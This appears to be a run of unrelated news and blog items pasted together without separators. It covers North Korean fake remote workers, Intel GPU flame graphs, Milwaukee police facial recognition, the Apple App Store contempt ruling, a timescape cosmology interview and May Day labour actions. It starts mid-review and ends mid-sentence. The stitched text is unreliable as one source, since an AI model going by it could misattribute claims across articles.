previous book because Bren is not quite as dim as Dallas, so the reader
doesn't have to suffer through quite as many stupid decisions.
The erotica continues to mostly (although not entirely) follow traditional
gender roles, with dangerous men and women who like attention. Presumably
most people are reading these books for the sex, which I am wholly
unqualified to review. For whatever it's worth, the physical descriptions
are too mechanical for me, too obsessed with the precise structural
assemblage of parts in novel configurations. I am not recommending (or
disrecommending) these books, for a whole host of reasons. But I think the
authors deserve to be rewarded for understanding that sex can be
communication and that good communication about difficult topics is
inherently interesting in a way that (at least for me) transcends the
erotica.
I bet I'm going to pick up another one of these about a year from now
because I'm still thinking about these people and am still curious about
how they are going to succeed.
Followed by
Beyond Temptation
, an interstitial novella. The next
novel is
Beyond Jealousy
.
Rating: 6 out of 10
Reviewed: 2025-04-30
The one interview question that will protect you from North Korean fake workers
RSAC
Concerned a new recruit might be a North Korean stooge out to steal intellectual property and then hit an org with malware? There is an answer, for the moment at least.
According to Adam Meyers, CrowdStrike's senior veep in the counter adversary division, North Korean infiltrators are bagging roles worldwide throughout the year. Thousands are said to have
infiltrated
the Fortune 500.
They're masking IPs, exporting laptop farms to America so they can connect into those machines and appear to be working from the USA, and they are using AI – but there's a question during job interviews that never fails to catch them out and forces them to drop out of the recruitment process.
"My favorite interview question, because we've interviewed quite a few of these folks, is something to the effect of 'How fat is Kim Jong Un?' They terminate the call instantly, because it's not worth it to say something negative about that," he
told
a panel session at the
RSA Conference
in San Francisco Monday.
Meyers explained the North Koreans will use generative AI to develop bulk batches of LinkedIn profiles and applications for remote work jobs that appeal to Western companies. During an interview, multiple teams will work on the technical challenges that are part of the interview while the "front man" handles the physical side of the interview, although sometimes rather ineptly.
"One of the things that we've noted is that you'll have a person in Poland applying with a very complicated name," he recounted, "and then when you get them on Zoom calls it's a military age male Asian who can't pronounce it." But it works enough that quite a few score the job and millions of dollars are being funneled back to North Korea via this route.
Once placed in the coveted role, such workers are usually very successful in the company, since they have multiple people working on one job to produce the best work possible - with the hope of getting a promotion and more access to the business' systems - explained panelist FBI Special Agent Elizabeth Pelker.
"I think more often than not, I get the comment of 'Oh, but Johnny is our best performer. Do we actually need to fire him?" she said.
The aims of
these phony workers
are two-fold, she explained. Firstly, they earn a wage and use their access to steal intellectual property from the victim. This is usually exfiltrated in tiny chunks so as to not trigger security systems.
One mitigation strategy, she said, was to insist that any interviewee performed coding tests within the corporate environment. These allow the actual IP being used to get checked, interviewers to see how often the prospect is switching between screens, and can allow other clues to leak out that all is not as it seems.
If the interloper is exposed and fired, however, they will usually have already collected login details, planted unactivated malware, and will then attempt to extort the maximum they can from the victim. She urged anyone who spots a fake employee to contact their local FBI field office immediately.
The Red Queen's race
But the attackers are getting smarter, and in some ways the FBI is a victim of its own success.
The agency has been distributing
advice
to US companies but these memos are also being read in Pyongyang and the workers are adapting their tactics. This sometimes involves using both aware and unwitting accomplices.
For example, to get around the IP address problem, laptop farms are springing up all over America. If an applicant gets a job, the firm will usually send him a laptop, at which point the interviewee explains that they've moved or have a family emergency, so could they send it to a new address please?
This is most likely a laptop farm, where someone in the US agrees to run the laptop from a legitimate address for a fee, typically around $200 a computer, according to Meyers. Last year the FBI
busted
one such operation in Nashville, Tennessee, and charged the operator with conspiracy to cause damage to protected computers, conspiracy to launder monetary instruments, conspiracy to commit wire fraud, intentional damage to protected computers, aggravated identity theft, and conspiracy to cause the unlawful employment of aliens.
Rather than creating identities, the North Korean workers have now taken to either stealing the ones they want, or fooling people into handing them over for a good cause. There's a growing business in Ukraine of convincing people to share their identity with third parties under the pretext of using them against Chinese agents who are propping up Russia.
"Unfortunately, because this is supporting North Koreans, the money then goes back through to filter through to North Korea regime," said Chris Horne, senior director at jobs site Upworthy. "Then, in turn, it goes to support the troops that come back in through Russia. So they're basically paying for their own demise in Ukraine right now."
We've also seen deepfake job interviewees that are
good enough
to fool IT professionals, sometimes more than once. This technology is only improving and will get more and more convincing, Pelker warned.
The key to fixing this, the panelists agreed, was to educate everyone in the interview process – right down to the lowest staffer – and to be hyper vigilant for warning signs. If possible, they said, one should have someone local swing around for a personal meeting, and maybe also avoid hiring fully remote employees. ®
AI Flame Graphs
are now
open source
and include Intel Battlemage GPU support, which means it can also generate full-stack GPU flame graphs for providing new insights into gaming performance, especially when coupled with
FlameScope
(an older open source project of mine). Here's an example of GZDoom, and I'll start with flame scopes for both CPU and GPU utilization, with details annotated:
(Here are the raw
CPU
and
GPU
versions.) FlameScope shows a subsecond-offset heatmap of profile samples, where each column is one second (in this example, made up of 50 x 20ms blocks) and the color depth represents the number of samples, revealing variance and perturbation that you can select to generate a flame graph just for that time range.
Putting these CPU and GPU flame scopes side by side has enabled your eyes to do pattern matching to solve what would otherwise be a time-consuming task of performance correlation. The gaps in the GPU flame scope on the right – where the GPU was not doing much work – match the heavier periods of CPU work on the left.
CPU Analysis
FlameScope lets us click on the interesting periods. By selecting one of the CPU shader compilation stripes we get the flame graph just for that range:
This is brilliant, and we can see exactly why the CPUs were busy for about 180 ms (the vertical length of the red stripe): it's doing compilation of GPU shaders and some NIR preprocessing (optimizations to the
NIR intermediate representation
that Mesa uses internally). If you are new to flame graphs, you look for the widest towers and optimize them first. Here is the
interactive SVG
.
CPU flame graphs and CPU flame scope aren't new (from
2011
and
2018
, both open source). What is new is full-stack
GPU
flame graphs and
GPU
flame scope.
GPU Analysis
Interesting details can also be selected in the GPU FlameScope for generating GPU flame graphs.
This example selects the "room 3" range, which is a room in the Doom map that contains hundreds of enemies.
The
green
frames are the actual instructions running on the GPU,
aqua
shows the source for these functions, and
red
(C) and
yellow
(C++) show the CPU code paths that initiated the GPU programs. The
gray
"-" frames just help highlight the boundary between CPU and GPU code. (This is similar to what I described in the
AI flame graphs
post, which included extra frames for kernel code.) The x-axis is proportional to cost, so you look for the widest things and find ways to reduce them.
I've included the
interactive SVG
version of this flame graph so you can mouse-over elements and click to zoom. (
PNG
version.)
The GPU flame graph is split between stalls coming from rendering walls (41.4%), postprocessing effects (35.7%), stenciling (17.2%), and sprites (4.95%). The CPU stacks are further differentiated by the individual shaders that are causing stalls, along with the reasons for those stalls.
GZDoom
We picked
GZDoom
to try since it's an open source version of a well known game that runs on Linux (our profiler does not support Windows yet). Intel Battlemage makes light work of GZDoom, however, and since the GPU profile is stall-based we weren't getting many samples. We could have switched to a more modern and GPU-demanding game, but didn't have any great open source ideas, so I figured we'd just make GZDoom more demanding. We built GPU demanding maps for GZDoom (I can't believe I have found a work-related reason to be using
Slade
), and also set some Battlemage tunables to limit resources, magnifying the utilization of remaining resources.
Our GZDoom test map has three rooms: room 1 is empty, room 2 is filled with torches, and room 3 is open with a large skybox and filled with enemies, including spawnpoints for Sergeants. This gave us a few different workloads to examine by walking between the rooms.
Using iaprof: Intel's open source accelerator profiler
The AI Flame Graph project is pioneering work, and has needed various changes to graphics compilers, libraries, and kernel drivers, not just the code but also how they are built. Since Intel has its own public cloud (the
Intel® Tiber™ AI Cloud
) we can fix the software stack in advance so that for customers it "just works." Check the
available releases
. It currently supports the Intel Max Series GPU.
If you aren't on the Intel cloud, or you wish to try this with Intel Battlemage, then it can require a lot of work to get the system ready to be profiled. Requirements include:
A Linux system with superuser (root) access, so that eBPF and Intel eustalls can be used.
A newer Linux kernel with the latest Intel GPU drivers. For Intel Battlemage this means Linux 6.15+ with the Xe driver; For the Intel Max Series GPU it's Linux 5.15 with the i915 driver.
The Linux kernel built with Intel driver-specific eustall and eudebug interfaces (see the
github docs
for details). Some of these modifications are upstreamed in the latest versions of Linux and others are currently in progress. (These interfaces are made available by default on the Intel® Tiber™ AI Cloud.)
All system libraries or programs that are being profiled need to include frame pointers so that the full stacks are visible, including Intel's oneAPI and graphics libraries. For this example, GZDoom itself needed to be compiled with frame pointers and also all libraries used by GZDoom (glibc, etc.). This is getting easier in the lastest versions of Fedora and Ubuntu (e.g., Ubuntu 24.04 LTS) which are shipping system libraries with
frame pointers
by default. But I'd expect there will be applications and dependencies that don't have frame pointers yet, and need recompilation. If your flame graph has areas that are very short, one or two frames deep, this is why.
If you are new to custom kernel builds and library tinkering, then getting this all working may feel like Nightmare! difficulty. Over time things will improve and gradually get easier: check the
github docs
. Intel can also develop a much easier version of this tool as part of a broader product offering and get it working on more than just Linux and Battlemage (either watch this space or, if you have an Intel rep, ask them to make it a priority).
Once you have it all working, you can run the
iaprof
command to profile the GPU. E.g.:
git clone --recursive https://github.com/intel/iaprof
cd iaprof
make deps
make
sudo iaprof record > profile.txt
cat profile.txt | iaprof flame > flame.svg
iaprof
is modeled on the Linux
perf
command. (Maybe one day it'll become included in
perf
directly.) Thanks to Gabriel Muñoz for getting the work done to get this open sourced.
FAQ and Future Work
From the launch of AI flame graphs last year, I can guess what FAQ #1 will be: “What about NVIDIA?”. They do have flame graphs in Nsight Graphics for GPU workloads, although their flame graphs are currently shallow as it is GPU code only, and onerous to use as I believe it requires an interposer; on the plus side they have click-to-source. The new GPU profiling method we've been developing allows for easy, everything, anytime profiling, like you expect from CPU profilers.
Future work will include github releases, more hardware support, and overhead reduction. We're the first to use eustalls in this way, and we need to add more optimization to reach our target of <5% overhead, especially with the i915 driver.
Conclusion
We've open sourced
AI flame graphs
and tested it on new hardware, Intel Battlemage, and a non-AI workload: GZDoom (gaming). It's great to see a view of both CPU and GPU resources down to millisecond resolution, where we can see visual patterns in the flame scope heat maps that can be selected to produce flame graphs to show the code. We applied these new tools to GZDoom and explained GPU pauses by selecting the corresponding CPU burst and reading the flame graph, as well as GPU code use for arbitrary time windows.
While we have
open sourced
this, getting it all running requires Intel hardware and Linux kernel and library tinkering – which can be a lot of work. (Actually playing Doom on Nightmare! difficulty may be easier.) This will get better over time. We look forward to seeing if anyone can fight their way through this work in the meantime and what new performance issues they can solve.
Authors: Brendan Gregg, Ben Olson, Brandon Kammerdiener, Gabriel Muñoz.
Milwaukee police trade: 2.5M mugshots for free facial recognition access
Milwaukee Police Department is proposing trading 2.5 million jail records for facial recognition technology access with the company Biometrica.
Police say acquiring the technology will lead to higher clearance rate of cases and improve the speed at which crimes are solved. Officials say it will not be used alone to establish probable cause.
Activists and residents have concerns over the impact to privacy and add to growing surveillance tech in the city. Some are concerned how federal agencies could access it as well.
Milwaukee police are mulling a trade: 2.5 million mugshots for free use of facial recognition technology.
Officials from the Milwaukee Police Department say swapping the photos with the software firm Biometrica will lead to quicker arrests and solving of crimes. But that benefit is unpersuasive for those who say the trade is startling, due to the concerns of the surveillance of city residents and possible federal agency access.
"We recognize the very delicate balance between advancement in technology and ensuring we as a department do not violate the rights of all of those in this diverse community," Milwaukee Police Chief of Staff Heather Hough said during an April 17 meeting.
For the first time, Milwaukee police officials detailed their plans to use the facial recognition technology during a meeting of the city's Fire and Police Commission, the oversight body for those departments. In the past, the department relied on facial recognition technology belonging to neighboring police agencies
In an April 24 email, Hough said the department has not entered into an agreement with any facial recognition and the department intends to continue engaging the public before doing so. The department will discuss it at a future meeting of the city's Public Safety and Health Committee next, she said.
"While we would like to acquire the technology to assist in solving cases, being transparent with the community that we serve far outweighs the urgency to acquire," she said in an email.
Officials said the technology alone could not be used as probable cause to arrest someone and the only authorized uses would be when there's basis to believe criminal activity has happened or could happen, or a threat to public safety is imminent.
Hough said the department intended to craft a policy that would ensure no one is arrested solely based on facial recognition matches.
That reassurance and others from police officials came as activists, residents and some public officials voiced concern.
Concerns ranged from studies which show bias in the technology; its potential use by federal agencies like Immigration Customs Enforcement; and infringement on civil liberties. Many speakers noted cities,
including Madison
, have banned facial recognition's use by city agencies.
Aurelia Ceja said the discrepancy in the information police release on themselves — noting that officers involved in shootings don't have their names released — compared to the amount of information the police have on residents is a concern.
At the meeting, officials shared how the technology had been used in recent cases — a homicide and a sexual assault — to assist in identifying suspects. In both cases, police ran photos of men ultimately charged in the crimes through facial recognition technology to help identify them. Those identifications were then confirmed during the investigation, police said.
The company the department is exploring working with is Biometrica, a company which began with working in the
gambling industry in the late '90s.
The police presentation said it does not retain data, such as photos of possible suspects, which the police put into its system to check for matches. In exchange for the initial 2.5 million jail records, the company is offering two free search licenses, with any additional licenses costing $12,000 each.
Biometrica did not respond to a request for comment.
Fire and Police Commissioner Krissie Fung, who was recently appointed to the oversight body, said in an interview she was unconvinced by the proposal to use the technology at this time. Use of facial recognition should be determined by residents, she said.
Fung, like other speakers at the meeting, were concerned with adopting the technology in the current political environment under President Donald Trump. She said the IRS agreeing to share data with Immigration Customs Enforcement as an example.
"I did not get the sense that there are clear protections against federal entities being able to access this facial recognition data either through MPD or the company they will use," she said.
A spokesperson for Mayor Cavalier Johnson declined comment on his support for the police acquiring the technology.
A commissioner cites own experience with bias in facial recognition
During the April 17 meeting, Fire and Police commissioner Ramon Evans said he had been subject to bias by facial recognition while at Potawatomi Casino.
"I got called over and I wasn't the guy," he said. "I was a victim of error."
That anecdote followed nearly 90 minutes of public comment from attendees, many who cited concerns over bias from the technology. For years, the technology's issues with identifying faces of Black and Brown people, and other minorities, has been well publicized.
Police officials also said Biometrica offers training for racial bias in the technology.
Last year,
a U.S. Commission on Civil Rights report
found the technology has been rapidly adopted by federal agencies with little oversight and raised particular risks for people of color and women. The report also found the U.S. Justice Department had awarded $4.2 million to local police for programs used, in part, for facial recognition.
The technology's capabilities and shortcomings are changing quickly, as evidenced by research from
Thaddeus Johnson
, an assistant professor at the Andrew Young School of Public Studies at Georgia State University. A former police captain in Memphis, he
studies facial recognition
and
published a study
in 2022 noting it contributed to greater racial disparities in arrests.
But, as he continued his research, the findings became more complicated.
In a 2024 study, Johnson found departments which use facial recognition technology saw lower rates of felony violence and homicides without contributing to disparities or over-arrests. In a review of the 2022 work that followed, Johnson found it led to higher disparities when used specifically on property crimes.
Now, he believes it makes sense for departments to use it for crimes like homicides, but not for things like theft and robbery.
Both of his studies focused on the outcomes of departments that used facial recognition. It did not examine how the tool was being used, like whether it focused on a specific neighborhood or crime type.
Johnson said facial recognition technology has improved greatly since his studies began; however, it still has large gaps between its effectiveness in perfect environments — portrait-like photos taken and analyzed — compared to those taken in everyday environments.
He believed police misuse of facial recognition was at greater fault for issues than the technology itself.
"It's not a magic bullet. It can if not used carefully, exacerbate these disparities," he said.
Facial recognition technology would only be the latest police technology in Milwaukee
The facial recognition proposal prompted backlash before it even began, with concerns over the growth of past police technology cited as a factor.
In a statement, the
American Civil Liberties Union of Wisconsin
asked the Milwaukee Common Council to adopt a two-year pause on any new surveillance technology and to develop and pass policy regulating existing technology. It also asked the council to incorporate community input through a public body called citizen control over police surveillance, or CCOPS for short.
It's the second technology the Milwaukee Police has announced plans for in the last month. The police announced plans for creating a drone team in March and whether its footage could be incorporated into facial recognition was scrutinized. The department's recently adopted policy prohibits it.
In recent years, the department also announced programs where residents can share surveillance footage with the police. The police also use a technology known as FLOCK cameras, which reads license plate numbers, and
has grown
across the
greater-Milwaukee area
in recent years.
"We are already seeing how surveillance technology is being weaponized in real time," the ACLU's statement said. "While we trust that our local leaders and police officers may have good intentions, history reminds us how quickly larger systems can override those intentions."
David Clarey is a public safety reporter at the Milwaukee Journal Sentinel. He can be reached at dclarey@gannett.com
.
★ Judge Yvonne Gonzalez Rogers Rules, in Excoriating Decision, That Apple Violated Her 2021 Court Order Regarding App Store Anti-Steering Provisions
Daring Fireball
daringfireball.net
2025-05-01 03:46:59
Are the results of this disastrous for Apple’s App Store business? I don’t think so at all. Gonzales Rogers is demanding that Apple ... do what Phil Schiller recommended they do all along. But are the results of this disastrous for Apple’s reputation and credibility? It sure seems like it....
To summarize:
One
, after trial, the Court found that Apple’s 30
percent commission “allowed it to reap supracompetitive operating
margins” and was not tied to the value of its intellectual
property, and thus, was anticompetitive. Apple’s response: charge
a
27 percent commission
(again tied to nothing) on off-app
purchases, where it had previously charged nothing, and extend the
commission for a period of seven days after the consumer
linked-out of the app. Apple’s goal: maintain its anticompetitive
revenue stream.
Two
, the Court had prohibited Apple from denying
developers the ability to communicate with, and direct consumers
to, other purchasing mechanisms. Apple’s response: impose
new
barriers and
new
requirements to increase friction and increase
breakage rates with full page “scare” screens, static URLs, and
generic statements. Apple’s goal: to dissuade customer usage of
alternative purchase opportunities and maintain its
anticompetitive revenue stream. In the end, Apple sought to
maintain a revenue stream worth billions in direct defiance of
this Court’s Injunction.
There’s quite a bit of fury in those italics. Rule one when you’re in court, any court, is “Don’t piss off the judge.” Apple has absolutely infuriated Gonzales Rogers through actions that all of us saw as outrageous.
In stark contrast to Apple’s initial in-court testimony,
contemporaneous business documents reveal that Apple knew exactly
what it was doing and at every turn chose the most
anti
competitive option. To hide the truth, Vice-President of
Finance, Alex Roman, outright lied under oath. Internally, Phillip
Schiller had advocated that Apple comply with the Injunction, but
Tim Cook ignored Schiller and instead allowed Chief Financial
Officer Luca Maestri and his finance team to convince him
otherwise. Cook chose poorly. The real evidence, detailed herein,
more than meets the clear and convincing standard to find a
violation. The Court refers the matter to the United States
Attorney for the Northern District of California to investigate
whether criminal contempt proceedings are appropriate.
This is an injunction, not a negotiation. There are no do-overs
once a party willfully disregards a court order. Time is of the
essence. The Court will not tolerate further delays. As previously
ordered, Apple will not impede competition. The Court enjoins
Apple from implementing its new anticompetitive acts to avoid
compliance with the Injunction.
Effective immediately
Apple will no longer impede developers’ ability to communicate with
users nor will they levy or impose a new commission on off-app purchases.
You know a judge is pissed when she busts out the bold italics. Later, on (page 21, citations omitted for readability):
Prior to the June 20 meeting, there were individuals within Apple
who were advocating for a commission, and others advocating for no
commission. Those advocating for a commission included Mr. Maestri
and Mr. Roman. Mr. Schiller disagreed. In an email, Mr. Schiller
relayed that, with respect to the proposal for “a 27% commission
for 24 hours,” “I have already explained my many issues with the
commission concept,” and that “clearly I am not on team
commission/fee.” Mr. Schiller testified that, at the time, he “had
a question of whether we would be able to charge a commission”
under the Injunction, a concern which he communicated.
Schiller comes across as Apple’s sole voice of reason, fairness, and dare I say honesty in this entire ruling. The only people in the world who seemed to think Apple could or should comply with the 2021 injunction (that apps be permitted to steer users to the web to make purchases) by charging a commission — any commission, let alone a 27 percent commission — on those web transactions were Apple’s finance team members, led by Luca Maestri and Alex Roman, and Tim Cook.
Unlike Mr. Maestri and Mr. Roman, Mr. Schiller sat through the
entire underlying trial and actually read the entire 180-page
decision. That Messrs. Maestri and Roman did neither, does not
shield Apple of its knowledge (actual and constructive) of the
Court’s findings.
I mean Jesus H. Christ, that’s scathing.
It’s worth pointing out that Luca Maestri is no longer Apple’s CFO. (
Kevan Parekh is
.) Back in August,
Apple announced
that Maestri was, effectively retiring as CFO “as part of a planned succession”. Apple’s statement didn’t use the word
retiring
, but rather the word
transitioning
. With this ruling and Maestri’s central role in Apple’s decision to forge ahead with a compliance plan where they “allowed” steering to the web by charging the same effective commissions on web transactions as they do for in-app transactions, I now have to wonder whether Maestri retired or “retired”. “Cook chose poorly” (by following Maestri’s recommendation) is not the sort of sentence from a judge that keeps CFOs in their jobs.
As for Alex Roman, I think he’s in some serious trouble. Like doing-time-in-the-clink trouble:
Despite its own considerable evaluation, during the first May 2024
hearing, Apple employees attempted to mislead the Court by
testifying that the decision to impose a commission was grounded
in AG’s report. The testimony of Mr. Roman, Vice President of
Finance, was replete with misdirection and outright lies. He even
went so far as to testify that Apple did not look at comparables
to estimate the costs of alternative payment solutions that
developers would need to procure to facilitate linked-out
purchases.
The Court finds that Apple
did
consider the external
costs developers faced when utilizing alternative payment
solutions for linked out transactions, which conveniently exceeded
the 3% discount Apple ultimately decided to provide by a safe
margin. Apple
did not
rely on a substantiated bottoms-up analysis
during its months-long assessment of whether to impose a
commission, seemingly justifying its decision after the fact with
the AG’s report.
Mr. Roman did not stop there, however. He also testified that up
until January 16, 2024, Apple had no idea what fee it would impose
on linked-out purchases:
Q. And I take it that Apple decided to impose a 27 percent fee
on linked purchases prior to January 16, 2024, correct?
A. The decision was made that day.
Q. It’s your testimony that up until January 16, 2024, Apple had
no idea what — what fee it’s going to impose on linked purchases?
A. That is correct.
Another lie under oath: contemporaneous business documents reveal
that on the contrary, the main components of Apple’s plan,
including the 27% commission, were determined in July 2023.
Neither Apple, nor its counsel, corrected the, now obvious, lies.
They did not seek to withdraw the testimony or to have it stricken
(although Apple did request that the Court strike
other
testimony). Thus, Apple will be held to have adopted the lies and
misrepresentations to this Court.
There’s so much more.
The whole ruling
is compelling — and damning — reading.
Keep in mind this whole thing stems from an injunction from a lawsuit filed by Epic Games
that Apple largely won
. The result of that lawsuit was basically, “
OK, Apple wins, Epic loses, but this whole thing where apps in the App Store aren’t allowed to inform users of offers available outside the App Store, or send them to such offers on the web (outside the app) via easily tappable links, is bullshit and needs to stop. If the App Store is not anticompetitive it should be able to compete with links to the web and offers from outside the App Store.
”
Are the results of this disastrous for Apple’s App Store business? I don’t think so at all. Gonzales Rogers is demanding that Apple ... do what Phil Schiller recommended they do all along, which is to compete fair and square with purchases available on the web. She’s not demanding they do what, say, Tim Sweeney wanted them to do. She’s basically saying Phil Schiller was right. Read her entire ruling and it’s hard to imagine anyone disagreeing with that.
But are the results of this disastrous for Apple’s reputation and credibility? It sure seems like it. But it would be worse — much worse — for Apple’s reputation if Phil Schiller weren’t still there. Without him, this ruling makes it sound like they’d be lost, both ethically and legally.
I’ll give the final words to Gonzales Rogers’s own closing:
Apple
willfully
chose not to comply with this Court’s
Injunction. It did so with the express intent to create
new
anticompetitive barriers which would, by design and in effect,
maintain a valued revenue stream; a revenue stream previously
found to be anticompetitive. That it thought this Court would
tolerate such insubordination was a gross miscalculation. As
always, the cover- up made it worse. For this Court, there is no
second bite at the apple.
It Is So Ordered.
Wyze pays $255k of tariffs on $167k of floodlights
New measurements of a certain type of supernova seems to indicate that our expanding universe isn't accelerating at all, negating any need to invoke a mysterious 'dark energy' to explain supernovae observations.
Recent observations from 1,550 supernovae fit the new 'timescape' model
This supernova remnant that's about 16,000 light years from Earth is from a particular class of supernovae called type Ia that astronomers use to measure cosmic distances.
(University of Texas/Chandra X-ray Observatory/NASA)
Quirks and Quarks
19:35
Is dark energy dying? A new theory suggests that the universe has different time zones
There's a cosmic controversy brewing in the universe. It centres around the mysterious force known as "dark energy."
This concept emerged from observations of distant supernovae that, in the late 1990s, seemed to indicate the universe had been expanding at a faster and faster pace ever since the big bang. Astronomers made these observations from a certain type of supernovae that explode in such a way that allows astronomers to calculate their distance from us.
The picture emerging from that data didn't fit with previous explanations of the universe that theorized its expansion, driven by the big bang, would eventually slow down as gravity took over. This led scientists to come up with the idea that a force they called "dark energy" pushed against gravity to make the universe expand faster and faster, in keeping with the supernovae data.
But since then, astronomers have measured — with greater precision — many more supernovae, as well as other bright objects in the distant universe. Doing so has revealed cracks in the standard model of cosmology that relies on dark energy to explain the data.
Artist's impression of a type Ia supernova where a smaller white dwarf star steals material from a red giant star before, left, and after, right, the explosion.
(ESO)
This has led to a new and different theory, dubbed the "timescape model," that recent research suggests may more accurately describe our universe.
Ryan Ridden, a postdoctoral research fellow at the University of Canterbury in Christchurch, New Zealand, was part of the team behind the
recent discovery
. Here is part of his conversation with
Quirks & Quarks
host
Bob McDonald.
So here we are 25 years after the original supernovae discoveries. What's proving to be the problem with the idea of dark energy?
So the idea of dark energy is kind of built on a very big assumption that the universe is a kind of featureless fluid. That it's the same in all directions, everywhere, on a certain scale. If you go through and do the equations with this fluid, you need this idea of a dark-energy-like substance to fit observations with the data.
There are cracks starting to emerge with a few different things, like we're starting to see irregularities in the distribution of very distant objects in the universe, which you shouldn't expect if the universe is uniform and the same in all directions.
We're also starting to see problems with other measurements, so measurements of distributions of galaxies in the universe. We expect the distribution of galaxies to be kind of controlled by things that happened very early in the beginning of the universe, when the universe was small, hot and dense, and sound waves could propagate through.
And there was a recent result by the Dark Energy Spectroscopic Instrument, which showed that this idea of dark energy doesn't quite explain their measurements either. They were starting to think that perhaps something like a time-evolving dark energy would be necessary to explain their observations.
The largest 3D map of our universe to date, made with data from the Dark Energy Spectroscopic Instrument (DESI), shows the universe's underlying web-like structure of matter.
(C. Mastro/Claire Lamman/DESI collaboration/)
So what our telescopes are seeing and measuring doesn't match the dark energy model, is that the idea?
Yeah. So that's pretty much what it's coming down to. The standard model of cosmology is an incredibly good descriptor of the universe. As with every model, they're only true insofar as they can reproduce the data.
And now that we've got all of these enormous and incredible surveys going on in astronomy that are collecting enormous amounts of data that dwarf any dataset that we've had before, we're starting to test the very limits of this model.
We're starting to see, at least from my perspective, that perhaps the assumptions that we're making to build the standard model of cosmology don't quite match up with what we're seeing in the universe around us.
OK, well, let's go to the alternative explanation that might fit the universe a little better. Tell me about the timescape model. How does it work?
It's fundamentally different from the standard model of cosmology because it abandons this assumption that the universe is the same and uniform in every direction.
Instead, the basis of the timescape model is that, in fact, we see in the universe around us today that there are giant cosmic structures, enormous filaments and walls filled with galaxies and galaxy clusters. And in between those filaments and walls we have giant voids of nothing.
This illustration highlights the cumulative impact galaxy clustering has had on the structure of the universe.
(NASA's Goddard Space Flight Center)
You can imagine it like blowing air into water filled with soap. You get all the bubbles forming on the surface. This is kind of what our universe looks like today. We have galaxies forming along the edges of the bubbles and where the bubbles meet. And then in the middle there is pretty much nothing going on.
So the idea with the timescape model is that these structures will play a significant role in the evolution of our universe. And the way they work is that in general relativity, there's this idea that acceleration or deceleration changes the rate at which time passes for you. So the faster you accelerate, the slower your clock will tick.
So if we go all the way back to the early universe where it was very smooth, hot and dense, there are tiny, tiny differences in that early universe, slightly denser regions and slightly less dense regions.
This [initial] difference in acceleration between the more dense and less dense regions isn't necessarily a lot, but if you fast forward through the history of the universe and measure the cumulative impact that they have, it has quite a significant change on the time that passes in those regions.
A representation of the evolution of the universe since the big bang.
(Wilkinson Microwave Anisotropy Probe consortium/NASA)
It's to the point where for us observers sitting inside dense regions of the universe, we would find that the universe is perhaps around 14.2 billion years old. But for the very middle of these giant voids, you might find that they're 21 billion years old. So time is ticking differently for these different regions.
In the empty spaces, time is passing more quickly than in the dense places where we are...
Yeah, exactly. So it's to do with the deceleration of the universe giving us this timescape of varying times across the universe. Because quite often, we just assume there's one fixed time for the entire universe, that it's around 13.7 billion years old.
But we know from general relativity that these effects must have some kind of impact. So the timescape model goes to the fundamental basics of cosmology, questions the assumptions that were there, and then builds this new model, which incorporates more aspects of general relativity into it.
So how does this add up to what looks like a universe that's accelerating, that's speeding up
?
Yeah, so as the universe is experiencing these different time frames, you also see these dense regions begin to contract. They're getting smaller. Whereas the less dense regions are expanding more or less at the same rate they were at the beginning of the universe.
Data from four telescopes were used to create this image of galaxies in a gravitational dance around each other.
(CXC/NASA/SAO/NASA-JPL/Caltech/ESA/CSA/STScI)
So over time, the total volume of the universe will become dominated by this kind of empty space that's expanding at the same rate.
For observers like us in dense regions, the effect is that when we look out across these great big void regions, the cumulative effect is that it begins to "appear" that the entire universe is accelerating in its expansion, but that's just a result of our position in the universe, this kind of mass biased position that we have.
ABOUT THE AUTHOR
Sonya Buyting is an award-winning science journalist whose brain is in its happy place when she's working on stories from the cutting edge of science. Sonya is a producer for CBC Radio's weekly science radio show, Quirks & Quarks, who got her start in science journalism on Discovery Channel Canada's Daily Planet and then at the air crash investigation show, Mayday.
Q&A has been edited for length and clarity.
Workers Defy the Billionaire Takeover on May Day
Portside
portside.org
2025-05-01 03:13:42
Workers Defy the Billionaire Takeover on May Day
Ray
Wed, 04/30/2025 - 22:13
...
In Chicago, the teachers union will lead a march starting at 11a.m. in Unity Park.
This story will be updated as May Day actions take place.
Where are the pitchforks? President Donald Trump’s administration has declared open season on the working class. Its henchmen have
unleashed
kidnappings by state agents, worksite raids that spread terror and stifle workplace militancy, massive federal layoffs, funding cuts with devastating consequences and attacks on diversity, equity and inclusion, as well as efforts to
eliminate collective bargaining rights
wholesale. The array of assaults may appear dizzying, but that’s by design: Confusion, division, fear and hopelessness are classic boss tactics, intended to silence dissent and chill organizing. We’re now seeing them on a national scale, as Trump and his cronies work to consolidate power while handing out tax cuts for billionaire pals and giving corporations carte blanche to fleece the public and the services they depend on (including access to medical care). The end game is oligarchy.
Amid the fear and uncertainty, the organized working class, comprising 14 million union members, has largely been quiet or focused on their individual fights. But the scope and horror of attacks on workers have jolted unions to consider new tactics and forge new alliances.
A
May Day Strong
coalition of over 200organizations, including major national labor unions and hundreds of community organizations, is planning 1,273 mass mobilizations, from strikes to sit-downs to rallies, across 1,031 cities and towns nationwide on International Workers Day, May 1. Among the anchoring organizations are the Chicago Teachers Union (which first brought groups together), National Education Association, American Federation of Teachers, Communication Workers of America, Association of Flight Attendants-CWA and United Electrical Workers, as well as the Sunrise Movement, the Center for Popular Democracy, Indivisible, and a panoply of other issue-based organizations, from Palestine organizing to reproductive justice to immigrant rights.
Participants will raise the unifying banner “For the Workers, Not the Billionaires,” a nod to the populist message of Occupy Wall Street in 2011, when thousands of people turned out to denounce bankers for the taxpayer-funded bailout.
“For many of the organizations involved with May Day mobilizations, this is the first time we are working outside of our union sector or region, and alongside federal government and private sector locals, with the participation of national community networks and their local affiliates,”
wrote
Jackson Potter, vice president of the Chicago Teachers Union, in
Convergence
magazine. CTU is one of the main conveners of the May Day Strong Coalition. The national day of action, Potter continued, “ us new partners to map geographies that have burgeoning union organizing campaigns, nodes of production where workers have disproportionate power, and community forces willing to throw down to defend our democratic rights and institutions.”
In some instances, unions are linking preexisting struggles against billionaire employers, whether university systems, hospitals or the superrich, and tying them to the broader class-wide assaults Trump has turbocharged in his 101 days in office. In others, community organizations and unions are testing out new alliances to bridge specific campaigns to a broader class-struggle orientation that positions working-class people as the countervailing power to billionaire rule. Will this be a dress rehearsal for possible general strike in May 2028? It’s all premature to say in these
whirlwind times
